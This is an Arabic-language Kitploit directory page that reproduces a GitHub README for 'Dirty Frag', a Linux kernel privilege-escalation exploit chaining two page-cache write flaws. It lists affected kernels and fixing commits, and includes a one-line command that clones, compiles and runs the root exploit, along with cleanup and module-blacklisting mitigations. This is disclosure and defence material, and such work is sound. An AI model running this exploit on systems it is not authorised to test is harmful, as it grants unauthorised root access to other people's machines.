Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43284 — Linux kernel privilege escalation exploit يربط ثغرتي page-cache write (CVE-2026-43284, CVE-2026-43500) للحصول على deterministic root access على التوزيعات الرئيسية. | Kitploit
أدوات/GitHubGitHub/frosterdl/cve-2026-43284
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubfrosterdl/cve-2026-43284

CVE-2026-43284

Linux kernel privilege escalation exploit يربط ثغرتي page-cache write (CVE-2026-43284, CVE-2026-43500) للحصول على deterministic root access على التوزيعات الرئيسية.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Dirty Frag: استغلال صلاحيات شامل لنظام لينكس

ملخص

يشرح هذا المستند فئة الثغرات Dirty Frag، التي اكتشفها وأبلغ عنها Hyunwoo Kim (@v4bel). من خلال ربط xfrm-ESP Page-Cache Write (CVE-2026-43284) مع RxRPC Page-Cache Write (CVE-2026-43500)، يمكن للمهاجم الوصول إلى صلاحيات الجذر (root) على توزيعات لينكس الرئيسية.

Dirty Frag توسع نفس عائلة الثغرات مثل Dirty Pipe و Copy Fail. إنها ثغرة منطقية حتمية لا تعتمد على نوافذ التوقيت أو السباقات (races)، ولا تسبب انهيارات kernel عند الفشل، ولها معدل نجاح مرتفع جدًا عند استغلالها.

للحصول على التفاصيل الفنية الكاملة والجدول الزمني للإفصاح، انظر إلى الوثائق الفنية المصاحبة (غير المضمنة في هذا المستودع).

  • تم إصلاح xfrm-ESP Page-Cache Write (CVE-2026-43284) في الفرع الرئيسي في الـ commit f4c50a4034e6.
  • تم إصلاح RxRPC Page-Cache Write (CVE-2026-43500) في الفرع الرئيسي في الـ commit aa54b1d27fe0.

[!NOTE] عندما تم نشر هذا المستند لأول مرة (2026-05-07)، كان الحظر (embargo) قد تم اختراقه خارجيًا بالفعل. في ذلك الوقت، لم يكن هناك أي تصحيح عام أو CVE متاح. بعد مناقشات مع المطورين على [email protected]، تم نشر الإفصاح عن Dirty Frag. انظر إلى الوثائق الفنية للحصول على الجدول الزمني.

الاستغلال

أمر واحد سريع

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

هذا الإثبات المفاهيمي (PoC) تم مشاركته لأغراض إعلامية بعد التنسيق مع linux-distros. لا تقم بتشغيله على أنظمة غير مصرح لك باختبارها.

التنظيف

⚠️ هام: تشغيل الاستغلال يلوث ذاكرة التخزين المؤقت للصفحات (page cache). لاستعادة حالة نظيفة، قم إما بتشغيل:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

أو أعد تشغيل الجهاز.

الإصدارات المتأثرة

  • CVE-2026-43284: ثغرة xfrm-ESP Page-Cache Write موجودة من الـ commit cac2661c53f3 (2017-01-17) حتى f4c50a4034e6 (2026-05-05).
  • CVE-2026-43500: ثغرة RxRPC Page-Cache Write موجودة من الـ commit 2dc334f1a63a (2023-06-08) حتى aa54b1d27fe0 (2026-05-10).

عمليًا، تمتد هذه الثغرات على مدى حوالي تسع سنوات.

إصدارات التوزيعات التي تم اختبارها تشمل:

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

التخفيف

  1. لإزالة الوحدات المتأثرة وتنظيف ذاكرة التخزين المؤقت للصفحات، قم بتشغيل:
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. قم بتطبيق التصحيحات العكسية (backports) من التوزيعة أو تصحيحات البائع (vendor patches) عند توفرها.

الأسئلة الشائعة (FAQ)

لماذا ربط ثغرتين؟

توفر ثغرة xfrm-ESP Page-Cache Write أداة قوية للكتابة العشوائية لـ 4 بايت (strong arbitrary 4-byte STORE primitive) تشبه Copy Fail وهي متوفرة على العديد من التوزيعات، ولكنها تتطلب صلاحية لإنشاء مساحة أسماء (namespace).

قد تقيد Ubuntu إنشاء مساحة أسماء غير مميزة عبر AppArmor، مما يمنع تشغيل xfrm-ESP. ثغرة RxRPC Page-Cache Write لا تتطلب صلاحيات إنشاء مساحة أسماء، ولكن وحدة rxrpc.ko غير موجودة افتراضيًا على العديد من التوزيعات. ومع ذلك، على Ubuntu، يتم تحميل rxrpc.ko عادةً.

ربط كلتيهما يغطي الفجوات لكل منهما، مما يمكن من الوصول إلى الجذر على جميع التوزيعات الرئيسية. انظر إلى الوثائق الفنية للحصول على التفاصيل.

سلسلة أخرى "مُسماة" "Dirty"؟

نعم — Dirty Frag مرتبطة بـ "Dirty Pipe"، والاسم يعكس أن فئة الثغرة تغير العضو frag في struct sk_buff.

العلاقة مع "Copy Fail"؟

ألهمت Copy Fail هذا البحث. ثغرة xfrm-ESP Page-Cache Write في سلسلة Dirty Frag تشترك في نفس الـ sink مع Copy Fail، ولكنها تُشغل حتى في وجود التخفيف الخاص بـ algif_aead. وبالتالي، الأنظمة المحصنة ضد Copy Fail قد تظل عرضة لـ Dirty Frag.

كيف أصلح لينكس الخاص بي؟

اتبع الخطوات في قسم التخفيف أعلاه.

الاتصال

المطور: https://linkedin.com/in/tahamuhammadshafiq

تنزيل الأداة